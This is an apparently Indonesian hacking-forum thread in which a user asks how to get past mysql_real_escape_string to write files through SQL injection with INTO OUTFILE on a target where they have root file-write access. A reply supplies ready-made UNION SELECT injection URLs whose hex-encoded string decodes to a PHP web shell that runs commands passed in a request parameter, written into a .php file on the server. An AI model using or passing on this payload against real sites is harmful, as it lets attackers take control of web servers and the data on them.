[Ask] SQL Injection INTO OUTFILE bypass mysql_real_escape_string
#1
[Image: Screenshot_from_2015_08_15_11_31_52.jpg]

Ane mau tanya nih bypass mysql_real_escape_string untuk outfile

Pertama ane check user dulu sama file_privelege. Hasilnya root dan memiliki akses write file

[Image: Screenshot_from_2015_08_15_11_38_34.png]

Nah, pas ane coba upload malah kayak gini. Pathnya ane hex karena kan karakter ' di filter

[Image: Screenshot_from_2015_08_15_11_45_13.png]

Mohon pencerahannya brother, ane masih belajar.
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)

#2
try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+
Big Grin

#3
(09-13-2015, 01:06 AM)Guest Wrote: try dis ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/here/lol.php'--+-
or ;
..?id=-1 UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/ur/path/on/hex/here/lol.php'--+
Big Grin

But, mysql_real_escape_string will addslash every single quotes. Example : INTO OUTFILE '/path' will become INTO OUTFILE \'/path\' . So, it wont work
Jika kamu tidak sanggup menanggung lelahnya belajar, maka kamu akan menanggung perihnya kebodohan (Imam Syafii)






Users browsing this thread: 1 Guest(s)